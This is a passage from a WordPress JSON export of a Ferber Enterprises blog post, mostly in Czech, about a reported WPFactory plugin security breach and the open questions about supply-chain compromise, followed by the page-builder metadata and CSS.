prost\u0159ed\u00ed.<\/p>\n\n\n\n<p>N\u00e1\u0161 t\u00fdm v Ferber Enterprises mezit\u00edm pokra\u010duje v anal\u00fdze podez\u0159el\u00fdch vzork\u016f plugin\u016f a sleduje dal\u0161\u00ed zn\u00e1mky napaden\u00ed, kter\u00e9 by mohly ohrozit webov\u00e9 str\u00e1nky WordPress po cel\u00e9m sv\u011bt\u011b.<\/p>\n\n\n\n<p>V dob\u011b zve\u0159ejn\u011bn\u00ed tohoto \u010dl\u00e1nku spole\u010dnost WPFactory tento probl\u00e9m potvrdila a uvedla, \u017ee aktivn\u011b pracuje na jeho vy\u0159e\u0161en\u00ed.<\/p>\n\n\n\n<p>Nicm\u00e9n\u011b, mnoho ot\u00e1zek z\u016fst\u00e1v\u00e1 nezodpov\u011bzen\u00fdch:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Byla kompromitov\u00e1na ofici\u00e1ln\u00ed distribu\u010dn\u00ed infrastruktura?<\/li>\n\n\n\n<li>Jak dlouho byly potenci\u00e1ln\u011b distribuov\u00e1ny \u0161kodliv\u00e9 bal\u00ed\u010dky?<\/li>\n\n\n\n<li>Byly ovlivn\u011bny dal\u0161\u00ed pluginy?<\/li>\n\n\n\n<li>Do\u0161lo k prolomen\u00ed z\u00e1kaznick\u00fdch \u00fa\u010dt\u016f nebo stahovac\u00edch syst\u00e9m\u016f?<\/li>\n\n\n\n<li>Z\u00edskali \u00fato\u010dn\u00edci trval\u00fd p\u0159\u00edstup k intern\u00ed infrastruktu\u0159e?<\/li>\n\n\n\n<li>Mohou st\u00e1le existovat dal\u0161\u00ed neaktivn\u00ed n\u00e1klady?<\/li>\n<\/ul>\n\n\n\n<p>Dokud nebudou tyto ot\u00e1zky pln\u011b vy\u0159e\u0161eny, z\u016fst\u00e1v\u00e1 opatrnost nezbytn\u00e1.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Budoucnost zabezpe\u010den\u00ed WordPressu<\/h2>\n\n\n\n<p>Incident WPFactory se nakonec m\u016f\u017ee st\u00e1t dal\u0161\u00edm p\u0159\u00edkladem probl\u00e9m\u016f v oblasti kyberbezpe\u010dnosti, kter\u00fdm \u010del\u00ed ekosyst\u00e9m otev\u0159en\u00e9ho softwaru na webu.<\/p>\n\n\n\n<p>WordPress poh\u00e1n\u00ed obrovskou \u010d\u00e1st glob\u00e1ln\u00ed internetov\u00e9 ekonomiky. Jak\u00e9koli rozs\u00e1hl\u00e9 naru\u0161en\u00ed ovliv\u0148uj\u00edc\u00ed v\u00fdvoj\u00e1\u0159e plugin\u016f proto m\u016f\u017ee m\u00edt d\u016fsledky sahaj\u00edc\u00ed daleko za hranice jednotliv\u00fdch web\u016f.<\/p>\n\n\n\n<p>Vzhledem k tomu, \u017ee \u00fato\u010dn\u00edci st\u00e1le \u010dast\u011bji vyu\u017e\u00edvaj\u00ed zranitelnosti v dodavatelsk\u00e9m \u0159et\u011bzci a techniky skryt\u00e9ho p\u0159etrv\u00e1v\u00e1n\u00ed, nelze bezpe\u010dnost plugin\u016f nad\u00e1le pova\u017eovat za druho\u0159adou z\u00e1le\u017eitost. Ve spole\u010dnosti Ferber Enterprises jsme p\u0159esv\u011bd\u010deni, \u017ee tato ud\u00e1lost je d\u016fle\u017eit\u00fdm p\u0159ipomenut\u00edm toho, \u017ee kyberbezpe\u010dnost nespo\u010d\u00edv\u00e1 pouze v ochran\u011b samotn\u00fdch webov\u00fdch str\u00e1nek, ale tak\u00e9 v zabezpe\u010den\u00ed v\u0161ech \u00farovn\u00ed distribu\u010dn\u00edho \u0159et\u011bzce softwaru.<\/p>\n\n\n\n<p>D\u016fv\u011bra v otev\u0159en\u00e9 ekosyst\u00e9my z\u00e1vis\u00ed na transparentnosti, rychl\u00e9 reakci na incidenty a siln\u00fdch praktik\u00e1ch opera\u010dn\u00ed bezpe\u010dnosti. WordPress ekosyst\u00e9m nyn\u00ed \u010del\u00ed d\u016fle\u017eit\u00e9mu okam\u017eiku.<\/p>\n\n\n\n<p>To, jak v\u00fdvoj\u00e1\u0159i, spr\u00e1vci repozit\u00e1\u0159\u016f, poskytovatel\u00e9 hostingu a bezpe\u010dnostn\u00ed t\u00fdmy zareaguj\u00ed na incidenty, jako je tento, pom\u016f\u017ee ur\u010dit, zda si WordPress m\u016f\u017ee i nad\u00e1le udr\u017eet d\u016fv\u011bru milion\u016f firem a organizac\u00ed, kter\u00e9 na n\u011bj ka\u017ed\u00fd den spol\u00e9haj\u00ed.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451638\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/cz\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/cz\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}